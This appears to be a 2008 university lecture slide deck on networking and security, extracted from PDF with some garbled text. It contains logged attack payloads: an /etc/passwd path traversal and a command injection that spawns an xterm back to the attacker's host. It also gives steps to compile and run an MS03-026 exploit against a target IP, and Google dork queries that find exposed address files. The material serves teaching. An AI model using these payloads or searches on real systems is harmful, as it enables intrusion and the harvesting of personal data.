Computer Networking
and
Security
RUDI LUMANTO
STMIK NUSA MANDIRI
RUDI LUMANTO
STMIK NUSA MANDIRI
November 2008
Referensi dan Kontak Info
)
)
)
)
Glenn Berg“Networking Essentials”, New
Riders
Deborah Russel, G.T Gangemi Sr,
“COMPUTER SECURITY
BASIC”,
O’Reillyy & Associates
John E Caravan, “FUNDAMENTALS OF
NETWORK SECURITY”, Artech House
internet
KONTAK : RUDI LUMANTO
[email protected]
0815-1036-9754
0815
1036 9754
STMIK NUSA MANDIRI
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
KRITERIA PENILAIAN
) TUGAS
(2-4 report) : 20%
) UJIAN TENGAH SEMESTER : 30%
%
) ABSENSI KEHADIRAN : 10 %
) UJIAN AKHIR SEMESTER : 40%
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
DAFTAR SILABUS
) Overview
) Network
standards (OSI)
) Network components
) Network p
protocol (TCP/IP)
(
)
) Network OS and Services
) Network/Internet Security
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
DAFTAR SILABUS
) Software
threats : virus,
virus worm etc
) Internet threats: TCP attack, DNS, DOS etc
) Firewall
i
ll andd Intrusion
i Detection
i System
S
(IDS)
) Cryptography and its applications
) VPN
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
COMPUTER
NETWORKING and
SECURITY
OVERVIEW
Standar
Keamanan
Jaringan
Komponen Jaringan
Ancaman Internet : TCP
Attack, DOS, DNS dll
Protokol (TCP/IP)
Ancaman Sofware :
Virus, Worm dll
OS dan Layanan
Jaringan
Firewall dan IDS
Cryptography dan
Aplikasi
VPN
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
COMPUTER NETWORKING and
SECURITY
1 OVERVIEW
1.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
outline
) Simple
cases and tools
) Why
y Computer
p
Networking
g and Whyy
Security ?
) Computer Security Goals.
Goals
) Threats, Vulnerabilities, Attacks
) Policy
li andd measure
) Making a good security policy
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Simple case and tool
( seing the
technique/informasition
behind a case)
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
A Security Case
A company called “Acme-art. Inc” doing an online business in the internet. They
have a database that record all customers information included their credit card
i f
information
i andd connectedd to their
h i site
i www.acme-art.com that
h protected
db
by fi
firewall.
ll
31 October 2001 a hacker intrude to their system and stole all credit card information,
Then put the information into newsgroup usenet. A few hour then the company has
loss million dollars , bad reputation and have to invest many more money to keep their
business alive.
What happen ?
How it could be happen ?
Fact : The firewall is installed. And the internet access can
only be done through http port 80.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Looking for clues in log file…
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
10.0.1.21
10
0 1 21 - - [31/Oct/2001:03:03:13 +0530] "GET
GET /index.cgi?page=falls.shtml
/index cgi?page=falls shtml HTTP/1.0
HTTP/1 0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
A
B
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
C
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
D
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd
HTTP/1.0" 200 358
E
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
HTTP/1 0" 200 1228
HTTP/1.0"
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0
+%26| HTTP/1.0" 200 1228
F
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Part A in log file
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
Browsingg …….
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Part B in logg file
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10 0 1 21 - - [31/Oct/2001:03:03:18 +0530] "GET
10.0.1.21
GET /tahoel
/tahoel.jpg
jpg HTTP/1
HTTP/1.00" 200 36580
Browsing …….
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Part C in log
l file
fl
10.0.1.21 - - [[31/Oct/2001:03:03:41
/ /
+0530]] "GET //cgi-bin/
g
/ HTTP/1.0"
/
403 272
T i direct
Trying
di t access ….
Error response
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Part D in logg file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
Attacking …
Security
Hole
1
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Perl script
Security hole 1: validation form for parameter variable will be transfer to index.cgi script
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Part E in log file
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd
HTTP/1.0" 200 358
Attacking …
Security
Hole
1
Recovering passwd file
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Passwd file
root:x:0:0:root:/root:/bin/bash
……
……
……
Lion:x:500:500::/home/lion:/bin/bash
Security hole 1 effect: recovering important “passwd” files
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
Part F in log file
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0
+%26| HTTP/1.0" 200 1228
Attacking …
Security
Hole
2
Direct execution to
server commands
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security team investigation:
Sample case 1
10.0.1.21 - - [[31/Oct/2001:03:17:29
/ /
+0530]] "GET //index.cgi?page=|xterm+g p g |
display+10.0.1.21:0.0
p y
+%26| HTTP/1.0" 200 1228
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Information/technique behind
the case
) Understanding
about computer and network
) Information about target
g
) HTTP Structure
) CGI/PERL
) LINUX system and its command
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Httpd file default structures Æ what is the web site structure ?
Lisv01
/(root)
h
home
var
u01 u02 u03 …
www
sbin
bi
bin
bi
html
(default user’s directory)
(default document root)
etc
httpd
log
public_html
dev
d
httpd
usr …
init.d
conf
httpd
httpd.conf
*Document root : The directory that holds HTML documents.
*
: file
11
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Behind the Web
Client-side application
WWW server
WWW
browser
Internet/
Intranet
WWW
server software
server_software
Execute application
N t
Network-loading
k l di application
li ti
WWW
browser
Application
Internet/
I t
Intranet
t
HTML
&
Script
JAVA SCRIPT
WWW server
WWW
server software
server_software
A li ti
Application
WWWブラウザ
Execute application
JAVA Applet,
Active X
S
Server-side
id application
li ti
WWW
browser
Internet/
Intranet
WWW server
WWW
Server
_software
Application
CGI,
CG
Active Server Pages
Execute application
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
S
Sampe
case 2
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Sample case 2
After a period of new reqruitment,
a server in a company suddenly crash down.
Company network become unavailable for
a while and it led to the much loss in production.
What happen ?
How it could be happen ?
No Log files indication !!!
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Sample case 2
Security team investigation: Looking for clues by social engineering
One new employee
O
l
iinstallll the
h windows
i d
2000 server in
i his
hi computer andd connect to
the LAN with global IP address.
Other Clues :
1. Nessus report on vulnerabilies in windows 2000
2. exploit program available
Analysis of Host
Nessus report
p on
Windows 2000 server
after IIS installation
RUDI LUMANTO
Address of Host
Port/Service
Issue regarding port
192.168.27.31
ftp (21/tcp)
Security hole found
192.168.27.31
smtp(25/tcp)
Security hole found
192.168.27.31
http (21/tcp)
Security hole found
192.168.27.31
nntp (119/tcp)
Security hole found
192.168.27.31
msrpc(135/tcp)
Security hole found
192.168.27.31
Netbios-ssn (139/tcp)
Security not found
192.168.27.31
https (443/tcp)
Security not found
192.168.27.31
Microsoft-ds (445/tcp)
Security hole found
……
….
….
……
….
….
STMIK NUSA MANDIRI, November 2008
Sample case 2
NESSUS report in detail
Other references: IAVA:2003-A-0012
NESSUS ID:11835
Vulnerability
msprc(135/tcp)
The remote host is running a version of windows which has a flaw in its
RPC interface which may
y allow an attacker to execute arbitrary
y code
and gain SYSTEM privileges. There is at least one WORM which is
currently exploiting this vulnerability. Namely, the MsBlaster worm.
Solution : see
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE:CAN-2003-0352
BID:8205
Other referemces: IAVA:2003-A-0011
NESSUS ID: 11806
Warning
RUDI LUMANTO
msprc(135/tcp)
Distributed Computing Environment (DCE) services running on the
remote host
STMIK NUSA MANDIRI, November 2008
Sample case 2
NESSUS ID : Identity Number of Vulnerability Check by NESSUS
BID : Buqtraq ID : related documentation regarding the vulnerability including
exploit code , see: security focus site
simulation
1. Downloading the exploit code source file (from security focus site or Whoppix CD)
$cp
p /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
p
p
y
2. Compiling source file
$gcc oc192-dom.c
3. executing the exploit into the IP target machine
$a out -dd 192.168.94.204
$a.out
192 168 94 204
Get the system access
C:>WINNT\SYSTEM32\
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Information/technique behind
the case
-Understanding about network
-Insufficient security orientation for new employee
-Lack
L k off knowledge
k
l d about
b t OS
-There is always exploit code in the internet
-Lack of information about update
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Why Computer Network ?
1. File sharing Æ memungkinkan akses terhadap sebuah file kapan saja dan
j
dimana saja
2. Effective data transfer ÆPengiriman data dengan cepat dan efisien
3. Hardware sharing Æ Dapat menggunakan bersama satu printer, hardisk dsb
4. Realtime communication Æ Dapat melakukan hubungan komunikasi via teks,
audio gambar ataupun video secara realtime
audio,
5. Operational cost reduction Æ mengurangi biaya komunikasi telpon, pemakaian
kertas, pengiriman surat dsb.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
File/Information resources sharing
g
Information resources : printer, data, files
Users can share a printer connected to LAN.
There is no need to connect to a printer to
each printer
Users can share data on the computers,
User in computer C can handle files on
Computer B as if they were his own files
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Effective data transfer
-
The data transmission speed is scores to several hundred Mbps. For example, A4 sized document
(30Kbytes) can be transmitted over a LAN in 0.024 second.
bps (bits per second) = a unit rate at which data can be transmitted over a communication line expressed
as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one
second.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Hardware sharing
- Effective use of hardware ((Printer, Hard disk etc))
- Easy to add new computers or relocate existing computers
- Easy to connect to computers of different vendors
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Contoh Kegunaan Jaringan
Seat Reservation Network
- Inquiries are issued from various places
- Connected to seat reservation database
on the central computer
- Answer to inquiries are generated
Immediately
- Also in updating databases and issues
a ticket
Example of similar system:
money withdrawal, balance inquiry etc
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Type
yp of Network
Mainly divided into 2 types based on
their scale (area that a network
covers).
LAN is implemented within a building
or Factory.
WAN is implemented by connecting
two or more LAN between office
and laboratories, or two countries
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Why Computer Security
)
T protect
To
t t company/individual
/i di id l assets
t
– Hardware, software and INFORMATION (data, ability
and Reputation)
)
To gain a competitive advantage
– How manyy ppeople
p will use a bank’s internet bankingg
system if they knew that the system had been hacked in
the past ?
)
)
RUDI LUMANTO
To comply
l with
i h regulatory
l
requirements
i
To keep your job
STMIK NUSA MANDIRI, November 2008
Computer Security Goals
)
)
)
C onfidentiality
I ntegrity
A vailability
il bilit
Confidentiality : Prevention of unauthorized access to data, and accidental data
disclosures
Integrity : Prevention of improper modifications of the data, either intentionally or
accidentally. 1) Modification of the data by unauthorized parties.
2) O
Operation
ti on d
data
t b
by authorized
th i d personnell iin ways th
thatt iis incompatible
i
tibl
with the nature (syntax) of the data, leading to its corruption.
3) Any modification to append-only records, to alter their evidence value.
protect data should not result in making
g it difficult
Availabilityy : Measures to p
to access and modify the data in ways in which it was intended.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Threats,vulnerabilities and Attacks
THREATS
Anything that can disrupt the operation,
operation
functioning, integrity or availability of
computer system
system.
) Stand
alone threats
– Threat arise without any connection to other system, Ex:
virus password cracker
virus,
) Connection
threats
– Threat arise because of connection to other system
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
◆Threats Arising from Connection to the other computers
Information leaks •• A database of customer information, including credit card
numbers is leaked from an Internet service provider
numbers,
provider.
Falsification
Denial of services
•• The contents of the web site of a public institution are
rewritten with the political messages of a dissident group.
•• A bookshop site is attacked and its server goes down,
discontinuing
d
sco t u g se
service.
ce
Impersonation
•• An intruder fakes a membership site for the purchase of
merchandise.
Attack platform
•• A corporate network administering a server used as a platform
for attacking other sites was sued for compensation for the
damage caused.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Vulnerabilities
Weakness in the design, configuration or
implementation of a computer system that
renders it susceptible to a threat.
1. POOR DESIGN
Hardware and software system that contain design flaws that can be
exploited Ex: sendmail flaws in early version of unix that allowed
exploited.
hackers to gain privileged root access
2. POOR IMPLEMENTATION
System that incorrectly configured because of in-experience,
in-experience insufficient
training or sloppy work. Ex: a system that does not ave restricted access
Privileged on critical executable file.
3. POOR MANAGEMENT
Inadequate procedures and insufficient checks and balances.
Ex: No documentation and monitoring
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Critical Vulnerabilities and
Vulnerability Scanning
) Certain
security vulnerabilities are declared
critical when they are (or are about to)
being actively exploited and represent a
clear and present danger
) Upon notification of a critical vulnerability,
systems
y
must be patched
p
byy a ggiven date or
they will be blocked from network access
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
◆Types of Vulnerability
OS/Program name
Cause
Influence
Index Server ( WindowsNT)
Index Service (Windows2000)
ISAPI extension idq.dll
overflow
Local system permission
seized by an outsider
telnetd ((FreeeBSD 4.3 and
earlier, Red Hat 7.1 and
earlier, etc.)
Buffer overflow during
g AYT
optional packet processing
Telnetd p
permission ((normally
y
root) seized by an outsider
sadmind (Solaris2.3 – 7)
Buffer overflow during
NETMGT_PROC_SERVICE
request processing
Command executable with
root permission by an outsider
SSH 1.2.31 OpenSSH 2.2 and
earlier
Overflow in an int variable in
detect_attack function
Command executable with
root permission by an outsider
dtspcd
p ((AIX 4.3/5.1, HP-UX
11.11, Solaris 8, etc.)
Buffer overflow in a shared
library
Arbitrary
y command
executable with root
permission by an outsider
Bind8.2x(Red Hat, Turbolinux,
Solaris, AIX , etc.)
Buffer overflow during TSIG
processing
Operation permission
(normally root) seized by an
outsider
wu-ftpd 2.6.0 and earlier (Red
Hat linux 6.2 and earlier, etc.)
Format string bug in site-exec
and setproctitle functions
Execution permission
(normally root) seized by an
outsider
IIS4.0 (WIndowsNT)
IIS5.0 (Windows2000)
Access to a file outside root
directory permitted when path
name is UNICODE
Shell command executed with
IUSR_Machinename
permission by an outsider
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
ATTACKS
A specific technique used to exploit a vulnerabilty.
Ex: a threat could be a denial of service,, a vulnerabilityy
is in the design of OS, and an attack could be
a “ping of death”
) Passive attacks
– Gathering information by monitoring and recording
traffic on the network, or by social engineering. Ex:
packet sniffing
sniffing, traffic analysis
)Active
attacks
– Overt actions on the computer system.
system
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
◆Denial of Service
Target host
Target host
Service downed
due to overload
• Large volume data
• Packets causing
a system down
Attack platform
Start attack!!
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Policy and Measure
)
Security Trinity : foundation for all security policies
and measures that an organization
g
develops
p and deploy
p y
Security
Prevention
RUDI LUMANTO
What is Security ?
Definitions from the Amer.Herit.Dic :
- Freedom from risk or danger:safety
- Measures adopted …. To prevent
a crime.
Computer Security Measures
-Mechanisms to prevent, detect and
recover from threats and attacks or
for auditing purposes.
STMIK NUSA MANDIRI, November 2008
Key point
Computer Security is not only a technical
problem it is a business and people
problem,
problem.
Th ttechnology
The
h l
iis th
the easy part,
t th
the diffi
difficult
lt
part is developing a security policies/plan
th t fits
that
fit the
th organization’s
i ti ’ business
b i
operation and getting people to comply with
th plan.
the
l
ÆSocial engineering
g
g : non-technical methods hackers employ
p y to g
gain access to
system, refers to the process of convincing a person to reveal information
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Security operations
-Prevention againts
g
accidental capture
p
or modification of
information
Detection of all improper access to data and system resources
-Recovery
R
from unauthorized access, restoring data values,
-
system integrity etc
Policies and Procedures
-User
U
privileged
i il
d
-Data backup
-Security tools to deploy
-Monitoring
Monitoring the integrity
-Response to Incident
-User role, etc
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
◆Types of Users
Hacker
Cracker
Script kiddy
A user who tries to obtain access using
g advanced knowledge
g
and techniques.
A user who attempts sabotage and other subversive activities
with malicious motives
A user who has little technical capability and uses tools available
on the Internet when attempting cyber attacks
Corporate network
Intrusion, subversion,
sabotage
RUDI LUMANTO
Vulnerability
Subversion,
sabotage
STMIK NUSA MANDIRI, November 2008
◆Integrity Check Tool
/etc/passwd file
#hash value (MD5)
dc577ef5f97b671781c04425737bc4df
File editing/falsification
Mismatch ... Altered!!
b0ed782bbd4c8445f07538a3ede788eb
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
◆Security Tools and Security Products
Malicious user
Malicious user
C
Corporate
t network
t
k
Server/client
Internet
Network security
Server security
Countermeasures
against hacking
• Router(Filtering)
• Firewall(VPN)
• N-IDS
• Vulnerability audit
• H-IDS
• Log monitoring
• Falsification prevention
• Vulnerability audit
Miscellaneous
• Virus scan
• Encryption
• Virus scan
• Encryption(SSH)
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
◆Firewall?
I t
Internet
t
Intranet
Public WWW
server
① HTTP
② HTTP
Client
Public FTP
server
③ FTP
④ HTTP
⑤Unspecific AP
Server
Client
Authentication
• Packet
P k t filt
filtering
i
GW type firewall
• Application gateway
• Stateful inspection
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
◆Encryption
VPN(Virtual Private Network)=Leased Line
the Internet e.g. IPsec IPv6
Remote
access user
FW/VPN
router
Encrypted
communication
Provider C
Provider A
IX
Internet
Provider B
Provider D
FW/VPN
router
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Making
g a good
g
security
y
policy
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Making a good security policy
) Penetration
Test/Ethical Hacking
– Understandingg what is inside the hackers
mind
) Security
y
Trinityy
) Security Goals
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Definition of "Ethical Hacking“
An ethical
A
thi l h
hacking
ki iis where
h
a computer
t and
d network
t
k expertt who
h
attacks a security system on behalf of its owners, seeking
vulnerabilities that a malicious hacker could exploit. To test a security
system ethical hacking uses the same methods as their less
system,
principled counterparts, but report problems instead of taking
advantage of them. Ethical hacking is also known as penetration
testing intrusion testing
testing,
testing, and red teaming
teaming. Individuals involved in
ethical hacking is sometimes called a white hat, a term that comes
from old Western movies, where the "good guy" wore a white hat
and the "bad g
guy"
y wore a black hat.
One of the first examples of ethical hacking at work was in the 1970s,
when the United States government used groups of experts called
red teams to hack its own computer systems. According to Ed
Skoudis, Vice President of Security Strategy for Predictive Systems'
Global Integrity consulting practice, ethical hacking has continued to
grow in an otherwise lackluster IT industry, and is becoming
i
increasingly
i l common outside
t id th
the governmentt and
d ttechnology
h l
sectors where it began. Many large companies, such as IBM,
maintain employee teams of ethical hackers.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Inside the Hackers Mind
- Successfully
S
f ll attackk andd Save
S
-
) Focus
on the target
) Never use your own information
) Never leave y
your footstepp
) Can ever back again
HACKERS PROCEDURE
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Hackers Procedure/step
) Targeting
) Scanning
) Remote Attack
1. Information gathering
) Local Attack
2. Attack, intrusion
) Log
removing / deception
) Space using
) Time stamp
) Back door
RUDI LUMANTO
3. Unauthorized act
4. Actions taken after
unauthorized act
STMIK NUSA MANDIRI, November 2008
Example of Targeting
All Informations about the target
)
)
)
Technique name : Web browser targeting
Goals : personal information about the target
Operation base - any web browser with search engine site
(google)
- online database (WHOIS, IPCONVERSION,etc)
Location, related company/organization, news, telephone number,
Contact (mail address), web author idea/though,/behaviour, site software
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Targeting with google
Byy usingg the basic search techniques
q
combined
with Google's advanced operators, anyone can
pperform information-gathering
g
g and
vulnerability-searching using Google. This
q is commonlyy referred to as Google
g
technique
hacking.
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Mastering
g google
g g using
g its standard options
p
–
–
–
–
Double quotation ….to be recognized a keyword as a phrase
Hyphen (-) …. If you want to exclude words contain keyword
site:
i
…. searching only inside the site
*
…. wildcard. Use with double quotation to find any
indicate word
– Intitle:
– Inurl:
– Intext:
I t t
web
– Filetype:
file
– Phonebook:
RUDI LUMANTO
…. search limited only to web title
…. search limited only to web page URL
…. searchh limited
li it d only
l to
t main
i page off the
th
…. search focusing on extention type of
…. search telephone number
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Mastering google using its options
– site:
…. searching only inside the site
“hacker” site:www.cnn.com or site:www.cnn.com hacker
This query searches for the
word hacker,
restricting the search to the
http://www.cnn.com
web site. How many pages on
the CNN web server contain
the word hacker
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Mastering google using its options
– *
RUDI LUMANTO
…. wildcard. Use with double quotation to find any indicate word
“He is a * Hacker”
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Mastering
aste g google
goog e using
us g its
ts standard
sta da d options
opt o s
– intitle:
RUDI LUMANTO
…. search limited only to web title
intitle: “Hacker”
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Mastering google using its standard options
– Inurl:
RUDI LUMANTO
…. search limited only to web page URL
inurl: www.securityfocus.com
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Masteringg google
g g using
g its standard options
p
– intext:
RUDI LUMANTO
…. search limited only to main page of the web
intext: “earthquake”
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Masteringg google
g g using
g its standard options
p
– Filetype:
…. search focusing on extention type of file
“hacking” filetype:ppt
" h
"whoppix"
i " fil
filetype:iso
i
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Google hacking
)
Masteringg google
g g using
g its standard options
p
– Phonebook: …. search telephone number
phonebook: John Doe CA
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
More on Google hacking
Searching the site inside (that actually) not explore to public
Finding on server directory listing
Directory listings provide a list of files and directories in a browser
window instead of the typical text-and graphics mix generally associated
with web pages. These pages offer a great environment for deep
information gathering
Most directory listings begin with the phrase
Index of
of, which also shows in the title
title. An
obvious query to find this type of page might be
intitle:index.of
which may find pages with the term index of in
the title of the document. Unfortunately, this
query will return a large number of false
positives, such as pages with the following titles:
RUDI LUMANTO
Index of Native American Resources on the Internet
LibDex—Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
STMIK NUSA MANDIRI, November 2008
More on Google hacking
C bi i google
Combination
l options
i
on queries
i
Several alternate qqueries that provide
p
more accurate results:
intitle:index.of "parent directory" intitle:index.of name size
These queries indeed provide directory listings by not only
focusing on index.of
index of in the title,
title but on keywords often found
inside directory listings, such as parent directory, name, and size.
Obviously, this search can be combined with other searches
to find
fi d files
fil off di
directories
i llocated
d iin di
directory lilistings.
i
Example:
p
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs
bbs.dat inurl:"Index of" intitle:“Index of“
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
More on Google hacking
Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
More on Google hacking
Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
More on Google hacking
RUDI LUMANTO
Example:
bbs.dat inurl:"Index of" intitle:“Index of“
STMIK NUSA MANDIRI, November 2008
More on Google hacking
Example: searching database of address people written in csv focusing to japan site
Æ filetype:csv
yp
address site:jp
jp
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
More on Google hacking
Example: searching database of address people written in EXCEL focusing to UK site
Æ filetype:xls
yp
address site:uk
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
THANK YOU
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008
Th Dawn
The
D
off th
the Net
N t
RUDI LUMANTO
STMIK NUSA MANDIRI, November 2008